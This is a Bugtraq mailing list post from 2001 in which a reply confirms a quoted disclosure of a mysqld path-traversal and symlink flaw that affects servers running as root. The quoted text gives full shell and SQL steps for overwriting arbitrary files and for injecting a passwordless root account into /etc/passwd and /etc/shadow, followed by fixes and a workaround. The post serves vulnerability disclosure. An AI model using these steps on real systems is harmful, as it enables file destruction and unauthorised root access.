Bugtraq mailing list archives

Re: potential vulnerability of mysqld running with root privileges(can be used as good DoS or r00t expoloit)

From: Scott Fagg <scott.fagg () ARUP COM AU>
Date: Tue, 20 Mar 2001 12:02:58 +1100

Works for mysql 3.23.32 running as root.

I used:

mysql -u root ../../../../tmp
create table yikes(w int(4));

This created /tmp/yikes.*

"Pavlov, Lesha" <lesha () NN RU> 19/3/01 4:32:37 am >>>

Anybody, who get login and password to mysql can use it as DoS or r00t
exploit because mysql accepts '../blah-blah' as valid database name and
each table represented by 3 files tablename.ISD, tablename.ISM and
tablename.frm, But, when mysqld checks table already exists or not
exists, it checks _only_ tablename.frm :

Usage this "vulnerable features of mysql" to make big DoS (Will
Overwrite any file you wish):
$ cd /var/tmp
$ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table qqq(www int);
\q
$
File /some/file/you/wish/to/overwrite will be overwritten.

Usage as r00t exploit:
$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$
You getta r00t now!

Recomendations:
* Patch mysql to when check table presents, it checks all
tablename.{ISD,ISM,frm} files, not only tablename.frm
* Patch mysql to treat database names, started by '..' as incorrect
database names.
* And Main recomendation - do not run mysqld as root!!!

Patches:
 not yet

Workaround:
chowns existing database tables to a normal user and run mysqld as this
unprivileged user - it will be better solution!.

Vulnerable versions:
This DoS/exploit tested on mysql-3.20.32a but i see another versions of
mysql also vulnerabile.

Comments:
Mysql dox recomends dont run mysqld as root, but People from RedHat
didnt read mysql dox - mysql istalled from rpm is vulnerable.

Current thread:

Re: potential vulnerability of mysqld running with root privileges(can be used as good DoS or r00t expoloit) Scott Fagg (Mar 20)
- Re: potential vulnerability of mysqld running with root privileges(can be used as good DoS or r00t expoloit) Sergei Golubchik (Mar 21)
- Re: potential vulnerability of mysqld running with root privileges(can be used as good DoS or r00t expoloit) JT (Mar 22)